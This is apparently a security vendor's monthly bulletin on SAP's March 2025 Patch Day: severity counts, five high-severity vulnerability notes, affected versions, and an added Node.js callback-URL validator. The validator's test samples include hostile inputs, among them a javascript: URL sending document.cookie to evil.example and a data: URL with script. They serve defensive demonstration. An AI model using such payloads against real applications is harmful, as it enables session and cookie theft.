Inprosec through its services, such as the SAP Security Assessment, helps its customers to improve the security levels of their SAP systems.
March 2025 Notes
Summary and Highlights of the Month
This month the total number of notes was 25, 4 more than in the previous period. As in the previous period, there were no HotNews notes. The number of high-severity notes fell by 1 compared with the previous month, from 6 to 5. Medium and low notes will not be reviewed, so we will give details of a total of 5 notes (all those with a CVSS of 7 or higher).
We have a total of 25 notes for the whole month (22 new and 3 updates of notes published in previous months).
We will review in detail a total of 5 notes, all of high severity:
- The most critical note of the month (CVSS 8.8) is rated High and concerns the “Cross-Site Scripting (XSS) vulnerability in SAP Commerce (Swagger UI)”.
- The next in severity, with the same score as the first (CVSS 8.8), concerns the “Missing Authorization check in SAP NetWeaver (ABAP Class Builder)”.
- The next in severity (CVSS 8.6) concerns the “Multiple vulnerabilities in Apache Tomcat within SAP Commerce Cloud”.
- This month the most common type is “Missing Authorization check” (8 of the 25 Patch Day notes).
The chart shows the classification of the March notes, together with the evolution and classification of the previous 5 months (only the Security Tuesday / Patch Day notes, by SAP):
Full details
The complete detail of the most relevant notes is as follows:
- Cross-Site Scripting (XSS) vulnerability in SAP Commerce (Swagger UI) (3569602): Due to insufficient input validation, SAP Commerce (Swagger UI) allows an unauthenticated attacker to inject malicious code from remote sources, which can be leveraged to execute a cross-site scripting (XSS) attack. This could have a high impact on the confidentiality, integrity and availability of data in SAP Commerce. Note that other components of SAP Commerce are not affected and that significant user interaction is required for the attack to materialize. Switching starter themes eliminates the risk by removing the explore feature of Swagger UI, which was vulnerable to the DOM-based XSS; the vulnerable DOM element is no longer rendered in Swagger UI. A workaround is available. CVSS v3 Base Score 8.8/10 [CVE-2025-27434]
- Missing Authorization check in SAP NetWeaver (ABAP Class Builder) (3563927): Due to a missing authorization check, SAP NetWeaver (ABAP Class Builder) allows an attacker to gain higher access levels than they should have, resulting in escalation of privileges. On successful exploitation this could result in disclosure of highly sensitive information, and it could also have a high impact on the integrity and availability of the application. With this correction, functionality restricted to the ABAP Development Workbench can no longer be executed through transaction SA38. There is no workaround. CVSS v3 Base Score 8.8/10 [CVE-2025-26661]
- Multiple vulnerabilities in Apache Tomcat within SAP Commerce Cloud (3566851): SAP Commerce Cloud uses a version of Apache Tomcat that could be vulnerable to denial of service (CVE-2024-38286) and unchecked error conditions (CVE-2024-52316). For these vulnerabilities, the prerequisites elaborated in the CVEs must apply first. To fix them, update Apache Tomcat to versions not affected by these CVEs. CVSS v3 Base Score 8.6/10 [CVE-2024-38286]
- Update – Authentication bypass via authorization code injection in SAP Approuter (3567974): The SAP Approuter Node.js package in version 16.7.1 and earlier is vulnerable to authentication bypass. When exchanging an authorization code, an attacker can steal the victim's session by injecting a malicious payload, with a high impact on the confidentiality and integrity of the application. To fix the issue, upgrade the SAP Approuter Node.js package to 16.7.2 or higher. This fix ensures that the URL protocol in the login callback URL is a valid one. CVSS v3 Base Score 8.1/10 [CVE-2025-24876]
- Update – Missing Authorization check in SAP PDCE (3483344): Elements of PDCE do not perform the necessary authorization checks for an authenticated user, resulting in escalation of privileges. This allows an attacker to read sensitive information, with a high impact on the confidentiality of the application. Once this note is applied, the affected functions are deactivated to restrict access. CVSS v3 Base Score 7.6/10 [CVE-2024-39592]
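The SAP Approuter note above says the fix consists of ensuring that the protocol of the login callback URL is a valid one. As an added example (not SAP Approuter's own code, whose internals the note does not describe), the following Node.js snippet shows what such a check looks like when applied to the URL a browser is redirected to after the authorization-code exchange: the scheme is restricted to http/https, embedded credentials and protocol-relative values are refused, and the host is matched against an allowlist. The function names, the allowlist and the sample inputs are assumptions constructed for this illustration.

```javascript
// Added example, not SAP Approuter code: validating a login callback URL
// before issuing the post-login redirect. Names and allowlist are assumed.

// Hosts allowed to receive the post-login redirect (constructed sample).
const ALLOWED_CALLBACK_HOSTS = new Set(["app.example.com", "portal.example.com"]);

// Only web schemes may appear in a login callback URL. Anything else
// (javascript:, data:, vbscript:, custom app schemes) is rejected outright.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// Decide whether `candidate` is a safe login callback URL.
// Returns an object so the caller can log *why* a value was rejected.
function checkCallbackUrl(candidate, allowedHosts = ALLOWED_CALLBACK_HOSTS) {
  if (typeof candidate !== "string" || candidate.length === 0) {
    return { ok: false, reason: "empty" };
  }
  // Reject control characters and whitespace before parsing: the WHATWG
  // parser strips tabs and newlines, which would otherwise let
  // "java\tscript:" collapse into "javascript:" after this check.
  if (/[\u0000-\u0020\u007f]/.test(candidate)) {
    return { ok: false, reason: "control-chars" };
  }
  let url;
  try {
    // No base URL on purpose: a relative or protocol-relative value
    // ("//evil.example/...") must fail to parse rather than silently
    // inheriting our own origin.
    url = new URL(candidate);
  } catch (e) {
    return { ok: false, reason: "unparseable" };
  }
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) {
    return { ok: false, reason: "protocol:" + url.protocol };
  }
  // "https://app.example.com@evil.example/" parses with hostname
  // evil.example; refuse embedded credentials regardless of host.
  if (url.username !== "" || url.password !== "") {
    return { ok: false, reason: "userinfo" };
  }
  if (!allowedHosts.has(url.hostname)) {
    return { ok: false, reason: "host:" + url.hostname };
  }
  // url.href is the normalised form (lower-cased scheme and host).
  return { ok: true, url: url.href };
}

// Simulated post-login step: the authorization code has already been
// exchanged and the browser must be sent back to the callback URL carried
// through the flow. Instead of writing an HTTP response we return the
// Location value (or a 400-style rejection with a safe fallback), so the
// behaviour can be exercised without a server.
function buildLoginRedirect(callbackUrl, fallback = "https://app.example.com/") {
  const verdict = checkCallbackUrl(callbackUrl);
  if (!verdict.ok) {
    // Never echo the rejected value back into a Location header.
    return { status: 400, location: fallback, reason: verdict.reason };
  }
  return { status: 302, location: verdict.url, reason: null };
}

// Constructed inputs: one legitimate callback plus the payload shapes an
// attacker would try when the protocol of the callback is never checked.
const SAMPLES = [
  "https://app.example.com/login/callback?code=abc",
  "javascript:fetch('https://evil.example/?c='+document.cookie)",
  "//evil.example/callback",
  "https://app.example.com@evil.example/callback",
  "https://evil.example/callback",
  "data:text/html,<script>alert(1)</script>",
];

for (const s of SAMPLES) {
  const r = buildLoginRedirect(s);
  const outcome = r.reason === null ? "redirect" : "reject(" + r.reason + ")";
  console.log(`${r.status} ${outcome}  ${s}`);
}
```

Parsing with `new URL()` without a base is deliberate: a value such as `//evil.example/callback` is a valid protocol-relative URL relative to the application's origin, and resolving it against a base would turn it into an `https://evil.example/...` redirect that passes the scheme check. Comparing `url.protocol` against an allowlist rather than looking for the substring `javascript:` also keeps case and whitespace tricks from slipping through.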
Reference links
Other references, from SAP and Onapsis (March):
SAP Security Patch Day – March 2025
SAP Patch Day: March 2025 – Onapsis
Resources affected
- SAP NetWeaver (ABAP Class Builder), Versions – SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 914
- SAP Commerce Cloud, Versions – HY_COM 2205, COM_CLOUD 2211
- @sap/approuter, Versions – 2.6.1 to 16.7.1
- SAP PDCE, Versions – S4CORE 102, 103, S4COREOP 104, 105, 106, 107, 108
- SAP Business One (Service Layer), Versions – B1_ON_HANA 10.0, SAP-M-BO 10.0
- SAP NetWeaver Application Server ABAP (applications based on SAP GUI for HTML), Versions – KRNL64UC 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.89, KERNEL 7.93, KERNEL 9.14
- SAP NetWeaver Application Server ABAP, Versions – SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 914
- SAP Business Warehouse (Process Chains), Versions – DW4CORE 100, DW4CORE 200, DW4CORE 300, DW4CORE 400, DW4CORE 914, SAP_BW 730, SAP_BW 731, SAP_BW 740, SAP_BW 750
- SAP NetWeaver Application Server Java, Version – AJAX-RUNTIME 7.50
- SAP NetWeaver Enterprise Portal (OBN component), Version – EP-RUNTIME 7.50
- SAP Web Dispatcher and Internet Communication Manager, Versions – WEBDISP 7.53, WEBDISP 7.54, WEBDISP 7.77, WEBDISP 7.89, WEBDISP 7.93
- SAP BusinessObjects Business Intelligence Platform, Versions – ENTERPRISE 430, 2025, 2027; ENTERPRISECLIENTTOOLS 430, 2025
- SAP S/4HANA (Manage Bank Statements), Versions – S4CORE 107, S4CORE 108
- SAP S/4HANA (RBD), Versions – S4CORE 102, 103, 104, 105, 106, 107, 108, EA-FINSERV 618, EA-FINSERV 800
- SAP Fiori apps (Posting Library), Versions – S4CORE 103, 104, 105, 106, 107, 108
- S/4HANA On-Premise, Versions – S4CORE 105, 106, 107, 108
- SAP Permit to Work, Versions – UIS4HOP1 800, 900
- SAP Commerce Cloud and SAP Datahub, Versions – HY_COM 2205, HY_DHUB 2205, COM_CLOUD 2211, DHUB_CLOUD 2211
- SAP CRM and SAP S/4HANA (Interaction Center), Versions – S4CRM 100, 200, 204, 205, 206, S4FND 102, 103, 104, 105, 106, 107, 108, S4CEXT 107, 108, BBPCRM 701, 702, 712, 713, 714, WEBCUIF 701, 731, 746, 747, 748, 800, 801
- SAP Just In Time, Versions – S4CORE 102, 103, 104, 105, 106, 107, ECC-DIMP 618
- SAP Electronic Invoicing for Brazil (eDocument Cockpit), Versions – SAP_APPL 617, 618, S4CORE 102, 103, 104, 105, 106, 107, 108